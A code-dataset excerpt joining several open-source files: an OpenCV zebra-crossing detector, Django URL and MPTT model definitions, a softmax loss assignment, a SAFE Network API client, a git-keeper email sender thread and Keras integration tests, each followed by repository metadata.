#cv2.drawContours(img, [approx], 0, (0, 0, 255), 1)
#cv2.drawContours(img, [bottom], 0, (255, 0, 255), 2)
#cv2.drawContours(img, [top], 0, (255, 0, 0), 2)
#drawPoint(img, tuple(top[0]), 5, (0, 255, 0))
return [top, bottom]
def fixPoint(pos):
x = pos[0]
y = pos[1]
if x < 0:
x = 0
if y < 0:
y = 0
#if x > pic_width:
# x = pic_width - 1
#if y > pic_height:
# y = pic_height - 1
return [x, y]
def getTopSideRect(pos):
if pos[0][0] > pos[1][0]:
pos1 = pos[1]
pos2 = pos[0]
else:
pos1 = pos[0]
pos2 = pos[1]
angle = PointConvertDegree(pos1, pos2)
dist = CalculateTwoPointDistance(pos1, pos2)
if top_ext_dist > 0:
addDist = dist / top_ext_dist
else:
addDist = 0
'''
posT1 = fixPoint(extendPoint(pos1[0], pos1[1], addDist, angle))
posT2 = fixPoint(extendPoint(pos1[0], pos1[1], addDist, angle - 180))
a1 = CalculateTwoPointDistance(posT1, pos2)
a2 = CalculateTwoPointDistance(posT2, pos2)
if a1 > a2:
pos1 = posT1
else:
pos1 = posT2
posT1 = fixPoint(extendPoint(pos2[0], pos2[1], addDist, angle))
posT2 = fixPoint(extendPoint(pos2[0], pos2[1], addDist, angle + 180))
a1 = CalculateTwoPointDistance(posT1, pos1)
a2 = CalculateTwoPointDistance(posT2, pos1)
if a1 > a2:
pos2 = posT1
else:
pos2 = posT2
'''
pos1 = fixPoint(extendPoint(pos1, addDist, angle - 180))
pos2 = fixPoint(extendPoint(pos2, addDist, angle))
#pos2 = fixPoint(extendPoint(pos2[0], pos2[1], dist / top_ext_dist, angle + 90))
#
NewP1 = extendPoint(pos1, dist / 2, angle)
NewPointA = np.int0(rotatePoint(pos1, NewP1, angle+90))
NewPointA = fixPoint(NewPointA)
#
NewP2 = extendPoint(pos2, dist / 2, angle)
NewPointB = np.int0(rotatePoint(pos2, NewP2, angle+90))
NewPointB = fixPoint(NewPointB)
#
dst_rect = []
dst_rect.append(pos1)
dst_rect.append(NewPointA)
dst_rect.append(NewPointB)
dst_rect.append(pos2)
dst_rect = np.array(dst_rect)
return dst_rect
def getBopttomSideRect(pos):
if pos[0][0] > pos[1][0]:
pos1 = pos[1]
pos2 = pos[0]
else:
pos1 = pos[0]
pos2 = pos[1]
angle = PointConvertDegree(pos1, pos2)
dist = CalculateTwoPointDistance(pos1, pos2)
#
NewP1 = extendPoint(pos1, dist / 2, angle)
NewPointA = np.int0(rotatePoint(pos1, NewP1, angle - 90))
NewPointA = fixPoint(NewPointA)
#
NewP2 = extendPoint(pos2, dist / 2, angle)
NewPointB = np.int0(rotatePoint(pos2, NewP2, angle - 90))
NewPointB = fixPoint(NewPointB)
#
dst_rect = []
dst_rect.append(pos1)
dst_rect.append(NewPointA)
dst_rect.append(NewPointB)
dst_rect.append(pos2)
dst_rect = np.array(dst_rect)
return dst_rect
def extendPoint(pos, d, theta):
theta_rad = pi/2 - radians(theta + 90)
return np.int0([pos[0] + d*cos(theta_rad), pos[1] + d*sin(theta_rad)])
#---------------------------------------------------------
def FindZebraCrossing(filePath):
srcImg = image = cv2.imread(filePath) #original
pic_width = image.shape[1]
pic_height = image.shape[0]
rect_area = np.int((pic_width * pic_height * 1.0) * rect_min_area)
# Color Filter
hsv = cv2.cvtColor(srcImg, cv2.COLOR_BGR2HSV) #hsv
low_color = np.array([0, 0, hvs_luminance])
# low_color = np.array([0, 0, 180])
upper_color = np.array([180, 43, 255])
mask = cv2.inRange(hsv, low_color, upper_color)
res = cv2.bitwise_and(srcImg, srcImg, mask=mask) #filter image
# Fix Image Color
image = cv2.cvtColor(srcImg, cv2.COLOR_BGR2RGB)
# canny
img_gray = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)
canny_img = cv2.Canny(img_gray, 150, 220, apertureSize=3) #canny
contours, hierarchy = cv2.findContours(canny_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) # for CV2
print("Contours:{} ", len(contours))
print("\n\n\n***************************************************************************\n")
area_pos = []
rect_pos = []
rect_center = []
rect_wh = []
for i in range(0, len(contours)):
hull = cv2.convexHull(contours[i])
if len(hull) < 5:
continue
return None
#---------------------------------------------------------
def main():
for im_name in os.listdir(pic_dir):
# im = Image.open(pic_dir + image)
print(im_name)
srcImg = image = cv2.imread(pic_dir+im_name)
pic_width = image.shape[1]
pic_height = image.shape[0]
rect_area = np.int((pic_width * pic_height * 1.0) * rect_min_area)
# Color Filter
hsv = cv2.cvtColor(srcImg, cv2.COLOR_BGR2HSV)
low_color = np.array([0, 0, hvs_luminance])
#low_color = np.array([0, 0, 180])
upper_color = np.array([180, 43, 255])
mask = cv2.inRange(hsv, low_color, upper_color)
res = cv2.bitwise_and(srcImg, srcImg, mask=mask)
# Fix Image Color
image = cv2.cvtColor(srcImg, cv2.COLOR_BGR2RGB)
#canny
img_gray = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)
canny_img = cv2.Canny(img_gray, 150, 220, apertureSize=3)
_,contours, hierarchy = cv2.findContours(canny_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) # for CV2
#印出輪廓數量
# print("Contours: ",len(contours))
# print("\n\n\n***************************************************************************\n")
area_pos = []
rect_pos = []
rect_center = []
rect_wh = []
for i in range(0, len(contours)):
hull = cv2.convexHull(contours[i])
if len(hull) < 5:
continue
# 計算重心
moments = cv2.moments(hull)
m00 = moments['m00']
centroid_x, centroid_y = None, None
if m00 != 0:
centroid_x = int(moments['m10'] / m00) # Take X coordinate
centroid_y = int(moments['m01'] / m00) # Take Y coordinate
circle_pos = (centroid_x, centroid_y)
if len(circle_pos) != 2:
continue
if (circle_pos[0] == None) or (circle_pos[1] == None):
continue
#print circle_pos
#x, y, w, h = cv2.boundingRect(hull)
#cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)
rect = cv2.minAreaRect(hull)
box = cv2.boxPoints(rect)
box = np.int0(box)
#cv2.drawContours(image, [box], 0, (0, 0, 255), 1)
a1 = CalculateTwoPointDistance(box[0], box[1])
a2 = CalculateTwoPointDistance(box[1], box[2])
box_w = max(a1, a2)
box_h = min(a1, a2)
if box_h <= 0:
continue
box_scale = (box_w / box_h)
box_area = (box_w * box_h)
if box_w == a1:
box_angle = PointConvertDegree(box[0], box[1])
else:
box_angle = PointConvertDegree(box[1], box[2])
if box_scale > rect_scale and box_area > rect_area:
box_color = GetRectColor(image, [box])
if box_color[0] > color_range and box_color[1] > color_range and box_color[2] > color_range:
# cv2.drawContours(image, [box], 0, (0, 0, 255), 1)
# drawPoint(image, circle_pos, 5, (255, 0, 0))
rect_pos.append(hull)
rect_center.append(circle_pos)
rect_wh.append([box_w, box_h, box_angle])
if not rect_pos:
pass
# exit()
else :
try :
idx_pos = CheckCluster(rect_center, rect_wh)
for idx in idx_pos:
for pos in rect_pos[idx]:
area_pos.append(pos)
area_pos = np.array(area_pos)
hull = cv2.convexHull(area_pos)
rect = cv2.minAreaRect(area_pos)
box = cv2.boxPoints(rect)
box = np.int0(box)
x, y, w, h = cv2.boundingRect(hull)
print(x,y,w,h)
im = image[y:y+h,x:x+w]
cv2.imwrite('dataset/true_for_train/' + im_name ,im)
except :
print("**** except #2 **** \n")
pass
# cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 1)
# cv2.drawContours(image, [hull], -1, (255, 0, 255), 1)
# cv2.drawContours(image, [box], 0, (0, 0, 255), 1)
#print hull
#print rect_wh[idx_pos[0]][2], rect_wh[idx_pos[0]][0]
#print rect_wh[idx_pos[1]][2], rect_wh[idx_pos[1]][0]
# line_dir = PointConvertDegree(rect_center[idx_pos[0]], rect_center[idx_pos[1]])
# line_dir = DegreeMirror(line_dir)
#
# dst = findSide(hull, line_dir)
# topRect = getTopSideRect(dst[0])
# bottomRect = getBopttomSideRect(dst[1])
#
#
# cv2.drawContours(image, [topRect], 0, (255, 0, 0), 2)
#cv2.drawContours(image, [bottomRect], 0, (255, 0, 0), 2)
# print ("Top", topRect)
# print ("Bottom", bottomRect)
#---------------------------------------------------------
# Escape Keyboard Event
def press(event):
if event.key == u'escape':
plt.close()
cv2.destroyAllWindows()
# fig.canvas.mpl_connect('key_press_event', press)
#顯示原圖 & output
# plt.subplot(1, 2, 1), plt.imshow(image)
# plt.title('Original'), plt.xticks([]), plt.yticks([])
#
# #顯示canny圖
# plt.subplot(1, 2, 2), plt.imshow(canny_img, cmap = 'gray')
# plt.title('Canny'), plt.xticks([]), plt.yticks([])
#
#
# image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
#
# plt.show()
#
# print("\n***************************************************************************")
# print(" End")
# print("***************************************************************************")
if __name__ == '__main__':
main() | mit | 461,858,287,817,124,300 | 30.529801 | 109 | 0.52601 | false |
MechanisM/djangodash2011 | test_project/test_app/urls.py | 1 | 1313 | from django.conf.urls.defaults import *
from staste.charts.views import PieChart, TimeserieChart, LatestCountAndAverageChart
from staste.middleware import response_time_metrica
from .views import IndexView
from .metrics import gender_age_metrica
urlpatterns = patterns('',
url(r'^$', IndexView.as_view(), name="index"),
url(r'^pie/$',
PieChart.as_view(metrica=gender_age_metrica,
axis_keyword='gender'),
name='gender_pie'),
url(r'^timeline/$',
TimeserieChart.as_view(metrica=gender_age_metrica),
name='gender_timeline'),
url(r'^requests/pie/$',
PieChart.as_view(metrica=response_time_metrica,
axis_keyword='view'),
name='requests_pie'),
url(r'^requests/$',
LatestCountAndAverageChart.as_view(metrica=response_time_metrica,
title='Requests count and average response time'),
name='requests_timeserie')
)
| bsd-3-clause | 8,659,286,452,042,558,000 | 41.354839 | 112 | 0.471439 | false |
watsonyanghx/CS231n | assignment1/cs231n/classifiers/softmax.py | 1 | 3849 | import numpy as np
from random import shuffle
def softmax_loss_naive(W, X, y, reg):
"""
Softmax loss function, naive implementation (with loops)
Inputs have dimension D, there are C classes, and we operate on minibatches
of N examples.
Inputs:
- W: A numpy array of shape (D, C) containing weights.
- X: A numpy array of shape (N, D) containing a minibatch of data.
- y: A numpy array of shape (N,) containing training labels; y[i] = c means
that X[i] has label c, where 0 <= c < C.
- reg: (float) regularization strength
Returns a tuple of:
- loss as single float
- gradient with respect to weights W; an array of same shape as W
"""
# Initialize the loss and gradient to zero.
loss = 0.0
dW = np.zeros_like(W)
#############################################################################
# TODO: Compute the softmax loss and its gradient using explicit loops. #
# Store the loss in loss and the gradient in dW. If you are not careful #
# here, it is easy to run into numeric instability. Don't forget the #
# regularization! #
#############################################################################
N = X.shape[0]
for i in xrange(N):
scores_i = np.dot(X[i, :], W) # score for ith training example
scores_i_max = np.max(scores_i) # get max value in scores_i
scores_i -= scores_i_max # normalization to avoid numeric instability
# compute loss, http://cs231n.github.io/linear-classify/#softmax
loss += -scores_i[y[i]] + np.log(np.sum(np.exp(scores_i)))
# Compute gradient
for j in xrange(W.shape[1]):
p = np.exp(scores_i[j]) / (np.sum(np.exp(scores_i)))
dW[:, j] += (p - 1 * (j==y[i])) * X[i, :]
# Compute average
loss /= N
dW /= N
# Regularization
loss += 0.5 * reg * np.sum(W**2)
dW += reg * W
#############################################################################
# END OF YOUR CODE #
#############################################################################
return loss, dW
def softmax_loss_vectorized(W, X, y, reg):
"""
Softmax loss function, vectorized version.
Inputs and outputs are the same as softmax_loss_naive.
"""
# Initialize the loss and gradient to zero.
loss = 0.0
dW = np.zeros_like(W)
#############################################################################
# TODO: Compute the softmax loss and its gradient using no explicit loops. #
# Store the loss in loss and the gradient in dW. If you are not careful #
# here, it is easy to run into numeric instability. Don't forget the #
# regularization! #
#############################################################################
N = X.shape[0]
# compute scores
scores = np.dot(X, W) # N*C
scores_max = np.max(scores, axis = 1).reshape((N, -1))
scores -= scores_max
# scores of correct class
scores_correct = scores[np.arange(N), y]
# compute loss, http://cs231n.github.io/linear-classify/#softmax
loss = np.sum(-scores_correct + np.log(np.sum(np.exp(scores), axis=1)))
loss /= N
# Compute gradient
# not np.exp(scores_correct) / np.sum(np.exp(scores), axis=1).reshape((N,-1))
p = np.exp(scores) / np.sum(np.exp(scores), axis=1).reshape((N,-1))
ind = np.zeros(p.shape)
ind[np.arange(N), y] = 1
dW = np.dot(X.T, (p-ind))
dW /= N
# Regularization
loss += 0.5 * reg * np.sum(W**2)
dW += reg * W
#############################################################################
# END OF YOUR CODE #
#############################################################################
return loss, dW
| mit | 1,709,612,362,439,225,600 | 34.971963 | 79 | 0.490517 | false |
obitec/django-maslow | maslow/models.py | 1 | 5045 | from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.contrib.contenttypes.models import ContentType
from django.contrib.flatpages.models import FlatPage
from django.contrib.postgres.fields import JSONField
from mptt.models import MPTTModel, TreeForeignKey, TreeManyToManyField
from mptt.managers import TreeManager
from reversion import revisions as reversion
class NaturalManager(models.Manager):
def get_by_natural_key(self, name):
return self.get(name=name)
class ThingManager(models.Manager):
def get_by_natural_key(self, name, parent):
return self.get(name=name, parent__name=parent)
class NaturalModel(models.Model):
name = models.CharField(max_length=120, unique=True)
def natural_key(self):
return self.name,
objects = NaturalManager()
def __str__(self):
return self.name
class Meta:
abstract = True
class DataForm(NaturalModel):
form = models.TextField(blank=True, verbose_name=_('Data form'), default='')
# calculated_values = ArrayField(models.CharField(max_length=100))
# action = models.CharField()
class Meta:
abstract = True
class DataMixin(models.Model):
description = models.TextField(verbose_name=_('Description'), blank=True, default='')
extra_data = JSONField(verbose_name=_('Extra data'), null=True, blank=True)
# data_form = models.ForeignKey(DataForm, null=True, blank=True)
class Meta:
abstract = True
class AuditMixin(models.Model):
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
# created_on = models.DateTimeField(default=timezone.now)
# updated_on = models.DateTimeField()
# def save(self, *args, **kwargs):
# self.updated_on = timezone.now()
# super().save(*args, **kwargs)
class Meta:
abstract = True
class NaturalDataModel(DataMixin, NaturalModel):
class Meta:
abstract = True
class MPTTMetaBase:
"""Base Meta class for MPTT models
"""
ordering = ('position', 'tree_id', 'lft')
unique_together = ('name', 'parent')
class Thing(MPTTModel):
""" AbstractThing as an abstract base class for all MPTT based
hierarchical models. It also defines a structural link type and
a jsonb datafield and form to extend models.
"""
name = models.CharField(max_length=250)
display_name = models.CharField(max_length=254, blank=True, default="")
description = models.TextField(blank=True, default='')
AP = 'AP'
EC = 'EC'
GS = 'GS'
CI = 'CI'
SL = 'SL'
STRUCTURAL_LINK_OPTIONS = (
(AP, _('part')), # _('Aggregation Participation')),
(EC, _('characteristic')), # _('Exhibition Characterization')),
(GS, _('type')), # _('Generalization Specialization')),
(CI, _('instance')), # _('Classification Instantiation')),
(SL, _('state'))) # _('State')),)
link_type = models.CharField(
max_length=2, choices=STRUCTURAL_LINK_OPTIONS,
default=GS, verbose_name=_('Structural Link Type'),
help_text=_('https://en.wikipedia.org/wiki/Object_Process_Methodology#Structural_and_Procedural_Links'))
PHYSICAL = 'physical'
INFORMATIONAL = 'informational'
ESSENCE_OPTIONS = (
(PHYSICAL, _('physical')),
(INFORMATIONAL, _('informational')))
essence = models.CharField(
max_length=15, choices=ESSENCE_OPTIONS,
default=INFORMATIONAL, verbose_name=_('Is the object physical or informatical?'),
help_text=_('https://en.wikipedia.org/wiki/Object_Process_Methodology#OPM_Things'))
parent = TreeForeignKey(
'self', null=True, blank=True, related_name='children', db_index=True, on_delete=models.CASCADE)
data = JSONField(blank=True, null=True)
data_form = models.ForeignKey(
FlatPage, null=True, blank=True, related_name='%(class)s_data_form', on_delete=models.CASCADE)
# TODO: Make order mean something.
position = models.PositiveIntegerField(blank=True, default=0)
image = models.ImageField(null=True, blank=True)
# def get_absolute_url(self):
# return reverse('assessment:thing_detail', kwargs={'pk': str(self.id)})
def __str__(self):
return self.display_name or self.name
def save(self, *args, **kwargs):
with reversion.create_revision():
reversion.set_comment('Import or backend changes')
super().save(*args, **kwargs)
objects = models.Manager()
tree = TreeManager()
class MPTTMeta:
order_insertion_by = ['position']
class Meta:
abstract = True
ONE = 1
HUNDRED = 100
THOUSAND = 1000
# HUNDRED_THOUSAND = 100000
MILLION = 1000000
# BILLION = '1 000 000'
MULTIPLIER_OPTIONS = (
(ONE, _('one')),
(HUNDRED, _('hundred')),
(THOUSAND, _('thousand')),
# (HUNDRED_THOUSAND, _('hundred thousand')),
(MILLION, _('million')),
# (BILLION, _('hundred million')),
)
| mit | 5,375,735,433,910,312,000 | 29.029762 | 112 | 0.656293 | false |
BillClyde/safenetfs | safenet/api/directory.py | 1 | 4211 | import safenet.api
import requests
import json
from StringIO import StringIO
import base64
__author__ = "William Clyde"
__copyright__ = "Copyright 2016, William Clyde"
__license__ = "MIT"
class Directory:
"""Directory management"""
def __init__(self):
"""__init__"""
self.headers = {'content-type': 'application/json',
'authorization':
'Bearer {0}'.format(safenet.api.getToken())}
def create(self, path, meta_data, is_private=True):
"""Create a new directory
Parameters
----------
:param path: string
path of new directory
:param meta_data: string
optional directory information
:param is_private: bool
marks the file as private
Returns
-------
bool
True if successful, False otherwise
"""
privacy = "true" if is_private else "false"
data = """{{ "isPrivate": {privacy}, "metadata": "{meta_data}" }}"""
response = requests.post(safenet.api.DRIVE_DIR_URL + path,
headers=self.headers,
data=data.format(privacy, meta_data=base64.b64encode(meta_data)))
if response.status_code == 200:
return True
return False
def get(self, path):
"""Get directory at path
Parameters
----------
:param path: string
path to directory
"""
response = requests.get(safenet.api.DRIVE_DIR_URL + path, headers=self.headers)
if response.status_code == 200:
return json.load(StringIO(response.text))
else:
return response.reason
def update(self, path, new_name, meta_data):
"""Update the name of the directory
Parameters
----------
:param path: string
path to directory
:param new_name: string
updated directory name
:param meta_data: string
optional directory information
Returns
-------
bool
True if successful, otherwise False
"""
data = """{{ "name":"{new_name}", "metadata":"{meta_data}" }}"""
response = requests.put(safenet.api.DRIVE_DIR_URL + path,
data=data.format(new_name=new_name,
meta_data=base64.b64encode(meta_data)),
headers=self.headers)
if response.status_code == 200:
return True
return False
def move(self, src_path, dest_path, copy=False):
"""Move directory to new location with optional copy
Parameters
----------
:param src_path: string
current path to directory
:param dest_path: string
new path to directory
:param copy: bool
copy file instead of moving
Returns
-------
bool
True if successful, otherwise False
"""
action = "copy" if copy else "move"
data = """{{ "srcRootPath":"drive",
"srcPath":"{src_path}",
"destRootPath":"drive",
"destPath":"{dest_path}",
"action":"{action}" }} """.format(src_path=src_path,
dest_path=dest_path,
action=action)
response = requests.post(safenet.api.DIR_URL + "/movedir",
data=data,
headers=self.headers)
if response.status_code == 200:
return True
return False
def delete(self, path):
"""delete
Parameters
----------
:param path: string
path of the directory to delete
Returns
-------
bool
True if successful, otherwise False
"""
response = requests.delete(safenet.api.DRIVE_DIR_URL + path, headers=self.headers)
if response.status_code == 200:
return True
return False
| mit | 7,075,495,754,665,540,000 | 28.243056 | 98 | 0.495607 | false |
ingolemo/python-lenses | lenses/__init__.py | 1 | 1059 | """A python module for manipulating deeply nested data structures
without mutating them.
A simple overview for this module is available in the readme or
at [http://github.com/ingolemo/python-lenses] . More detailed
information for each object is available in the relevant
docstrings. `help(lenses.UnboundLens)` is particularly useful.
The entry point to this library is the `lens` object:
>>> from lenses import lens
>>> lens
UnboundLens(TrivialIso())
You can also obtain a bound lens with the `bind` function.
>>> from lenses import bind
>>> bind([1, 2, 3])
BoundLens([1, 2, 3], TrivialIso())
"""
from typing import TypeVar
from . import optics
from . import ui
# included so you can run pydoc lenses.UnboundLens
from .ui import UnboundLens
S = TypeVar("S")
def bind(state: S) -> ui.BoundLens[S, S, S, S]:
"Returns a simple BoundLens object bound to `state`."
return ui.BoundLens(state, optics.TrivialIso())
lens = ui.UnboundLens(optics.TrivialIso()) # type: ui.UnboundLens
__all__ = ["lens", "bind", "optics"]
| gpl-3.0 | 6,049,408,742,977,415,000 | 25.475 | 66 | 0.707271 | false |
miracle2k/onkyo-eiscp | setup.py | 1 | 1149 | #!/usr/bin/env python
# coding: utf8
from setuptools import setup, find_packages
# Get long_description from README
import os
here = os.path.dirname(os.path.abspath(__file__))
f = open(os.path.join(here, 'README.rst'))
long_description = f.read().strip()
f.close()
setup(
name='onkyo-eiscp',
version='1.2.8',
url='https://github.com/miracle2k/onkyo-eiscp',
license='MIT',
author='Michael Elsdörfer',
author_email='michael@elsdoerfer.com',
description='Control Onkyo receivers over ethernet.',
long_description=long_description,
packages = find_packages(exclude=('tests*',)),
entry_points="""[console_scripts]\nonkyo = eiscp.script:run\n""",
install_requires=['docopt>=0.4.1', 'netifaces', 'xmltodict>=0.12.0'],
platforms='any',
classifiers=[
'Topic :: System :: Networking',
'Topic :: Games/Entertainment',
'Topic :: Multimedia',
'Intended Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
]
)
| mit | 784,736,929,684,786,300 | 30.888889 | 73 | 0.641986 | false |
CaliopeProject/CaliopeServer | src/cid/modules/siim2_forms/models/editable_models.py | 1 | 1346 | # -*- encoding: utf-8 -*-
"""
@authors: Andrés Felipe Calderón andres.calderon@correlibre.org
Sebastián Ortiz V. neoecos@gmail.com
@license: GNU AFFERO GENERAL PUBLIC LICENSE
SIIM2 Models are the data definition of SIIM2 Information System
Copyright (C) 2013 Infometrika Ltda.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
#system, and standard library
#neomodel primitives
from neomodel.properties import (Property,
DateTimeProperty,
FloatProperty,
IntegerProperty,
StringProperty)
from cid.core.forms.models import SIIMForm
class ProjectForm(SIIMForm):
pass | agpl-3.0 | 160,416,028,745,061,100 | 36.333333 | 79 | 0.685034 | false |
git-keeper/git-keeper | git-keeper-server/gkeepserver/email_sender_thread.py | 1 | 5346 | # Copyright 2016 Nathan Sommer and Ben Coleman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Provides a global interface for sending emails in a rate-limited fashion.
The email sender runs in a separate thread so that other threads do not need
to block when trying to send email due to rate limiting.
This module stores an EmailSenderThread instance in the module-level variable
named email_sender. Call start() on this instance to start the thread.
Example usage:
from gkeepserver.server_configuration import config
from gkeepserver.email_sender_thread import email_sender
from gkeepserver.email import Email
def main():
config.parse()
email_sender.start()
email = Email('guy@domain.com', 'sup guy', 'Hi, guy!')
email_sender.enqueue(email)
email_sender.shutdown()
email_sender.join()
"""
from queue import PriorityQueue, Empty
from threading import Thread
from time import time, sleep
from gkeepserver.gkeepd_logger import gkeepd_logger as logger
from gkeepserver.server_configuration import config
from gkeepserver.server_email import Email
class EmailSenderThread(Thread):
"""
Provides a Thread which blocks waiting for new emails and sends them in a
rate-limited fashion.
Usage:
Call the inherited start() method to start the thread.
Shutdown the thread by calling shutdown(). The sender will keep sending
emails until the queue is empty, and then shut down. Call join() after
shutdown() in the main thread to allow all the enqueued emails to be sent
before proceeding.
Add emails to the thread by calling enqueue(email). Emails must be
gkeepserver.email.Email objects.
"""
def __init__(self):
"""
Construct the object.
Constructing the object does not start the thread. Call start() to
actually start the thread.
"""
Thread.__init__(self)
self._email_queue = PriorityQueue()
self._last_send_time = 0
self._shutdown_flag = False
def enqueue(self, email: Email):
"""
Add a new email to the queue.
Sending is rate-limited so the email will not be sent immediately.
:param email: the email to send
"""
self._email_queue.put(email)
def shutdown(self):
"""
Shutdown the thread.
The run loop will not exit until all queued messages have been sent.
This method blocks until the thread has died.
"""
self._shutdown_flag = True
self.join()
def run(self):
"""
Send emails as they arrive in the queue.
This method should not be called directly. Call the start() method
instead.
Sends at most 1 email every _min_send_interval seconds.
Loops until someone calls shutdown().
"""
while not self._shutdown_flag:
try:
while True:
email = self._email_queue.get(block=True, timeout=0.1)
if not isinstance(email, Email):
warning = ('Item dequeued for emailing that is '
'not an email: {0}'.format(email))
logger.log_warning(warning)
else:
self._send_email_with_rate_limiting(email)
except Empty:
pass
except Exception as e:
logger.log_error('Error in email sender thread: {0}'
.format(e))
def _send_email_with_rate_limiting(self, email: Email):
# Send the email. Sleep first if need be.
#
# :param email: the email to send
# if _min_send_interval seconds have not elapsed since the last email
# was sent, sleep until _min_send_interval seconds have elapsed
current_time = time()
if current_time - self._last_send_time < config.email_interval:
elapsed_time = current_time - self._last_send_time
sleep_time = config.email_interval - elapsed_time
sleep(sleep_time)
self._last_send_time = current_time
try:
email.send()
logger.log_info('Sent email: {0}'.format(email))
except Exception as e:
if not email.max_send_attempts_reached():
logger.log_warning('Email sending failed, will retry')
self._email_queue.put(email)
else:
error = ('Failed to send email ({0}) after several '
'attempts: {1}'.format(email, e))
logger.log_error(error)
# module-level instance for global email sending
email_sender = EmailSenderThread()
| agpl-3.0 | 5,637,033,515,681,715,000 | 30.821429 | 77 | 0.628507 | false |
jendap/tensorflow | tensorflow/python/keras/integration_test.py | 1 | 10325 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for Keras."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.python import keras
from tensorflow.python.framework import dtypes
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.ops import nn_ops as nn
from tensorflow.python.ops import rnn_cell
from tensorflow.python.platform import test
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class VectorClassificationIntegrationTest(keras_parameterized.TestCase):
def test_vector_classification(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(10,),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_model_from_layers(
[keras.layers.Dense(16, activation='relu'),
keras.layers.Dropout(0.1),
keras.layers.Dense(y_train.shape[-1], activation='softmax')],
input_shape=x_train.shape[1:])
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
history = model.fit(x_train, y_train, epochs=10, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
def test_vector_classification_shared_model(self):
# Test that Sequential models that feature internal updates
# and internal losses can be shared.
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(10,),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
base_model = testing_utils.get_model_from_layers(
[keras.layers.Dense(16,
activation='relu',
kernel_regularizer=keras.regularizers.l2(1e-5),
bias_regularizer=keras.regularizers.l2(1e-5)),
keras.layers.BatchNormalization()],
input_shape=x_train.shape[1:])
x = keras.layers.Input(x_train.shape[1:])
y = base_model(x)
y = keras.layers.Dense(y_train.shape[-1], activation='softmax')(y)
model = keras.models.Model(x, y)
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
if not testing_utils.should_run_eagerly():
self.assertEqual(len(model.losses), 2)
self.assertEqual(len(model.updates), 2)
history = model.fit(x_train, y_train, epochs=10, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
# See b/122473407
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TimeseriesClassificationIntegrationTest(keras_parameterized.TestCase):
@keras_parameterized.run_with_all_model_types
def test_timeseries_classification(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(4, 10),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
layers = [
keras.layers.LSTM(5, return_sequences=True),
keras.layers.GRU(y_train.shape[-1], activation='softmax')
]
model = testing_utils.get_model_from_layers(
layers, input_shape=x_train.shape[1:])
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
history = model.fit(x_train, y_train, epochs=15, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
